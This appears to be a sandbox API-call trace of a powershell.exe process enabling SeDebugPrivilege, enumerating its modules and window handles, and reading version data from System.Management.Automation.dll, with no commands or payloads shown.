	[0102.139] VerLanguageNameW (in: wLang=0x0, szLang=0x256ff0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0102.141] CoTaskMemFree (pv=0x256ff0) 
	[0102.141] VerQueryValueW (in: pBlock=0x2b87370, lpSubBlock="\\", lplpBuffer=0x1adfa8, puLen=0x1adfa0 | out: lplpBuffer=0x1adfa8*=0x2b87398, puLen=0x1adfa0) returned 1
	[0102.147] GetCurrentProcessId () returned 0x310
	[0102.155] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x1aced0 | out: lpLuid=0x1aced0*(LowPart=0x14, HighPart=0)) returned 1
	[0102.158] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x1acef0 | out: TokenHandle=0x1acef0*=0x2ec) returned 1
	[0102.159] AdjustTokenPrivileges (in: TokenHandle=0x2ec, DisableAllPrivileges=0, NewState=0x2b8abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0102.573] EnumProcessModules (in: hProcess=0x2ec, lphModule=0x2b8ac50, cb=0x200, lpcbNeeded=0x1adf08 | out: lphModule=0x2b8ac50, lpcbNeeded=0x1adf08) returned 1
	[0102.576] GetModuleInformation (in: hProcess=0x2ec, hModule=0x13ff20000, lpmodinfo=0x2b8aec0, cb=0x18 | out: lpmodinfo=0x2b8aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0102.577] CoTaskMemAlloc (cb=0x804) returned 0x2b4060
	[0102.577] GetModuleBaseNameW (in: hProcess=0x2ec, hModule=0x13ff20000, lpBaseName=0x2b4060, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0102.577] CoTaskMemFree (pv=0x2b4060) 
	[0102.578] CoTaskMemAlloc (cb=0x804) returned 0x2b4060
	[0102.578] GetModuleFileNameExW (in: hProcess=0x2ec, hModule=0x13ff20000, lpFilename=0x2b4060, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0102.578] CoTaskMemFree (pv=0x2b4060) 
	[0102.579] CloseHandle (hObject=0x2ec) returned 1
	[0102.586] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x310) returned 0x2ec
	[0102.587] GetExitCodeProcess (in: hProcess=0x2ec, lpExitCode=0x1ae038 | out: lpExitCode=0x1ae038*=0x103) returned 1
	[0102.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12b8b088, Length=0x20000, ResultLength=0x1ae000 | out: SystemInformation=0x12b8b088, ResultLength=0x1ae000*=0x11fb8) returned 0x0
	[0102.884] EnumWindows (lpEnumFunc=0x29f66ac, lParam=0x0) returned 1
	[0102.885] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.885] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.885] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.885] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x334
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x324
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.886] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x45c
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x914
	[0102.887] GetWindowThreadProcessId (in: hWnd=0xa022e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x9ec
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x1401b2, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x610
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x60192, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xb5c
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xbdc
	[0102.887] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x8f0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xb8c
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5e0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x90
	[0102.888] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0102.888] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x840
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x844
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x46c
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xb40
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x914
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x988
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x914
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x950
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x914
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x914
	[0103.172] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x868
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x850
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x830
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x814
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x744
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x2a8
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x534
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5e4
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5c4
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x58c
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x238
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x584
	[0103.173] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x7e8
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x678
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x35c
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x51c
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x360
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x274
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x588
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xc8
	[0103.174] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x21c
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5ec
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x334
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x664
	[0103.174] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x334
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x664
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x334
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5ec
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5ec
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x550
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x7a0
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x594
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x564
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x45c
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x548
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x518
	[0103.175] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x508
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4ec
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x45c
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x45c
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x44c
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x7ec
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x45c
	[0103.176] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x324
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4a0
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x914
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x914
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x4023c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x9b4
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x500be, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x8fc
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x6022a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xbc0
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xb0
	[0103.177] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x804
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xbc8
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x854
	[0103.177] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x140
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x55c
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x34c
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xb40
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x988
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x868
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x850
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x830
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x814
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x744
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x2a8
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x534
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5e4
	[0103.178] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5c4
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x58c
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x238
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x584
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x7e8
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x678
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x35c
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x51c
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x360
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x274
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x588
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0xc8
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x21c
	[0103.179] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x664
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x334
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x5ec
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x550
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x7a0
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x594
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x45c
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x508
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x4ec
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x45c
	[0103.180] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1add60 | out: lpdwProcessId=0x1add60) returned 0x7ec
	[0103.184] WerSetFlags () returned 0x0
	[0103.190] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0103.191] CoTaskMemFree (pv=0x0) 
	[0103.191] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ae0c8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ae0c0 | out: pulNumLanguages=0x1ae0c8, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ae0c0) returned 1
	[0103.191] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ae0c8, pwszLanguagesBuffer=0x2bb35d0, pcchLanguagesBuffer=0x1ae0c0 | out: pulNumLanguages=0x1ae0c8, pwszLanguagesBuffer=0x2bb35d0, pcchLanguagesBuffer=0x1ae0c0) returned 1
	[0103.196] CoTaskMemAlloc (cb=0x24) returned 0x2a6580
	[0103.196] GetUserDefaultLocaleName (in: lpLocaleName=0x2a6580, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0103.196] CoTaskMemFree (pv=0x2a6580) 
	[0103.332] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0103.332] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.332] CoTaskMemFree (pv=0x204160) 
	[0103.334] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0103.334] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.334] CoTaskMemFree (pv=0x204160) 
	[0103.336] CoTaskMemAlloc (cb=0x104) returned 0x204160
	[0103.336] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x204160, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0103.336] CoTaskMemFree (pv=0x204160) 
	[0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ada90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.345] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1adb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0103.346] SetErrorMode (uMode=0x1) returned 0x1
	[0103.346] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1add40 | out: lpFileInformation=0x1add40*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0103.346] SetErrorMode (uMode=0x1) returned 0x1
	[0103.346] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1adfb0 | out: lpdwHandle=0x1adfb0) returned 0x94c
	[0103.347] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2bb6e60 | out: lpData=0x2bb6e60) returned 1
	[0103.347] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1adf28, puLen=0x1adf20 | out: lplpBuffer=0x1adf28*=0x2bb6efc, puLen=0x1adf20) returned 1
	[0103.347] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb6fd8, puLen=0x1ade90) returned 1
	[0103.347] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0103.347] CoTaskMemAlloc (cb=0x2e) returned 0x2b22f0
	[0103.347] lstrcpyW (in: lpString1=0x2b22f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0103.347] CoTaskMemFree (pv=0x2b22f0) 
	[0103.348] VerQueryValueW (in: pBlock=0x2bb6e60, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ade98, puLen=0x1ade90 | out: lplpBuffer=0x1ade98*=0x2bb702c, puLen=0x1ade90) returned 1
	[0103.348] lstrlenW (lpString="System.Management.Automation") returned 28
	[0103.348] CoTaskMemAlloc (cb=0x3c) returned 0x2b5210
	[0103.348] lstrcpyW (in: lpString1=0x2b5210, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0103.348] CoTaskMemFree (pv=0x2b5210) 
